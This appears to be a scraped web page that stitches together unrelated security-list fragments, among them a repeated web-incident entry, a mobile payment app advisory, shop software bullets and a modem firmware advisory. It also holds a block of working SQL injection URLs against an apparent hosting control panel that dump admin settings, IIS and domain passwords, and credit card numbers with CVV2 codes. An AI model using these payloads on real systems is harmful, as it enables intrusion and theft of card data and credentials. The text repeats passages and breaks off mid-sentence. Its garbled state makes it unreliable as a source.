| New User, Welcome! Login |
credit card
soul" on the Web site of the police department in Tucson, Arizona. Only
unlike regular defacement, this time it is not the front page but rather the
news section that was modified.
WHID 2007-63: Credit card data theft at Kartenhaus, a Ticketmaster German
subsidiary
=========================================================================
Reported: 19 December 2007, Occurred: 30 September 2007
Classifications:
soul" on the Web site of the police department in Tucson, Arizona. Only
unlike regular defacement, this time it is not the front page but rather the
news section that was modified.
WHID 2007-63: Credit card data theft at Kartenhaus, a Ticketmaster German
subsidiary
=========================================================================
Reported: 19 December 2007, Occurred: 30 September 2007
Classifications:
soul" on the Web site of the police department in Tucson, Arizona. Only
unlike regular defacement, this time it is not the front page but rather the
news section that was modified.
WHID 2007-63: Credit card data theft at Kartenhaus, a Ticketmaster German
subsidiary
=========================================================================
Reported: 19 December 2007, Occurred: 30 September 2007
Classifications:
Application: mChek 3.4 by http://www.mchek.com/
Platform: Symbian OS 9.1, Series 60 v3.0. Other mobile platforms might behave in same way.
Severity: Low
Details:
mChek is an E-commerce application which allows users to store multiple credit/debit cards in the phone and use them when required. mChek (Version 3.4) application stores multiple Credit Card numbers and corresponding bank account information to phone storage without protection. It also provides a feature to Link Bank Accounts to this application. mChek application writes all this information to a file on the phone file system. Upon inspection, it was observed that credit card number and corresponding bank name was written in cleartext to mobile phone storage. It was also observed that after a credit card is deleted from mCheck’s user interface, the credit card number continues to exist in the phone file system. If the phone is lost/stolen or any other phone user is able to read phone’s file system, the stored credit/debit card numbers and Bank name can be compromised.
Vendor Response:
mChek Version 3.4 is an older version of the product. The current version is 3.8. In this version, cardnumber, bankname and phonenumber are not stored in clear text and using encrypted storage. When the credit card information is deleted by the user, it’s deleted from the application DB as well but the behavior is not same in all phone make and models. We are providing enough protection to the sensitive data stored and the security is not dependent on the user ability to read the file system of the phone.
Having said that, even in Version 3.4, only creditcard number and bank name were stored as cleartext. The risk was very low as it is not possible to make a transaction with cardnumber alone. All other sensitive data like exp date for example are encrypted and stored and encryption key never stored in mobile phone and making the information very secure.
> soul" on the Web site of the police department in Tucson, Arizona. Only
> unlike regular defacement, this time it is not the front page but rather the
> news section that was modified.
>
>
> WHID 2007-63: Credit card data theft at Kartenhaus, a Ticketmaster German
> subsidiary
> =========================================================================
> Reported: 19 December 2007, Occurred: 30 September 2007
>
> Classifications:
- Unlimited Products and Categories
- Gift Vouchers/Coupons
- Download/Virtual Product support
- Secure/Stable code base
- Web Based admin Panel
- Supports PayPal, AuthorizeNet, Real time credit card processing
- Supports UPS, USPS and Fed X shipping
- Unlimited product Specials
- Separate customer groups (Retail, Wholesale, or add your own groups)
- Compatible with most other mods available for osCommerce
Dear Viktor. thank you for sharing your experience and your personal point
of view, I appreciate that.
As to the banks, indeed actual, eventual, down-time was non consequential
(for some, 2 hours) while others still did not process credit card
requests a month later. All-in-all incident response made sure people in
the streets only found out about certain issues through the press.
As to the technical evidence, indeed, the attacks, while sizable (c'mon,
4mpps is still big) is almost insignificant when compared with size of
On Tue, Apr 7, 2009 at 5:42 PM, Matthew Dempsky <matthew@dempsky.org> wrote:
> Adgregate is a "TechCrunch 50" startup that recently signed a
> distribution deal with Google/DoubleClick [1]. As a service, they
> offer a "viral widget" intended to be hosted on untrusted third-party
> sites through which consumers can enter their credit card information.
> According to their website, they offer over 1.2 million products
> through this service. More details can be found at [2].
>
> Consumers are able to validate that their data entry is secure by
> clicking on a "validate this widget" button within the widget.
http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select propname,adminname,propvalue,propname From Adminprop where 1=1 order by name
---SQL SERVER
http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select Databasename,Owner,Loginname,Servername From SQLServer where 1=1 order by name
---IISPasswords
http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select FolderID,WebsiteID,User,Folder From IISPasswords where 1=1 order by name
---CreditCards
http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select creditcardno,expdate,isEncrypted,cvv2 From creditcard where 1=1 order by name
---DSN
http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select DSNName,DSNOwner,FilePath,Driver From DSN where 1=1 order by name
---Domain Registration
http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select domainname,domainpassword,ns1,ns1_IP From DomainRegistration where 1=1 order by name
The firmware image is readily available for download from airtel's website, and many other websites. The firmware image consists of a
linux kernel, root file-system, configuration and (maybe) other binary blobs. There seems to be no security/check on firmware image's
authority. It is easy to modify a firmware image and replace the root-filesystem with a malicious root-filesystem. Worse yet, the modified root file-system could effectively disable further firmware updates. A malicious firmware image could provide an attacker with complete access and control on the modem and the network traffic on the modems.
5. Once an attacker has access to a modem (through telnet and/or a firmware update), he/she can launch the following attacks and/or more:
* use MITM attacks to capture encrypted data, including passwords, credit-card numbers and other confidential data
* inject malicious content into the network stream which can hijack the user's system [viruses, trojans, malware, bots]
* sniff, tap and monitor the network user and his/her actions online
* redirect user's traffic and subject the user to SPAM, Ads, or use DNS poisoning in inventive ways
* generate network traffic to launch DDoS attacks - effectively hijacking the user's internet connection and making them zombie bots
* redirect nefarious network activities through hijacked modems to make it difficult/impossible to track the attack source/origin, and carry out illegal activities. In such cases, the blame might go to an innocent Airtel subscriber as his/her IP would apparently be the source of the illegal activity.
|
|
|
